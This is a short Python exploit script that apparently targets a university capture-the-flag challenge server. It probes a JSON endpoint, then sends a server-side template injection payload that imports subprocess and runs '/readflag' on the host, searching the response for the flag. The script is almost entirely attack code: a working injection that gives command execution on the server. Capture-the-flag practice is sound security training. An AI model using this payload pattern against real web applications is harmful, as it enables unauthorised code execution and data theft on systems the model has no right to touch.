#!/usr/bin/env python3
import requests
import urllib3
import json
urllib3.disable_warnings()

BASE_URL = "https://vulnerability-research-dbfd88d4dab49dc2.chals.uoftctf.org"

# Try accessing with .json extension
print("[*] Testing .json extension...")

r = requests.get(
    BASE_URL + "/welcome/default/index.json",
    params={"json": json.dumps({"test": "value"})},
    verify=False
)

print(f"Status: {r.status_code}")
print(f"Content-Type: {r.headers.get('Content-Type')}")
print(f"Content: {r.text[:300]}")

if r.status_code == 200:
    print("\n[+] .json extension works!")
    
    # Now try with SSTI payload in the JSON
    print("\n[*] Testing SSTI in JSON parameter...")
    
    payload_data = {
        "test": "{{=__import__('subprocess').check_output(['/readflag']).decode()}}"
    }
    
    r2 = requests.get(
        BASE_URL + "/welcome/default/index.json",
        params={"json": json.dumps(payload_data)},
        verify=False
    )
    
    print(f"Status: {r2.status_code}")
    
    if "uoftctf" in r2.text.lower():
        print("\n[!!!] FLAG FOUND!")
        print(r2.text)
    else:
        with open("json_response.txt", "w") as f:
            f.write(r2.text)
        print(f"Response saved. Length: {len(r2.text)}")